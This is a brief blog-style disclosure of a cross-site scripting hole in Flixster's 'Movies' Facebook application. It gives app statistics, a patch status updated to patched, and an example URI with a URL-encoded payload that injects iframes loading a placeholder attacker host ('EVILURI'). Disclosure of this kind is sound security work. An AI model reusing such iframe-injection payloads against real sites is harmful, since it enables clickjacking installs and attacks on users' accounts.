FAXX Hack: Movies (Flixster)

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Unpatched Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.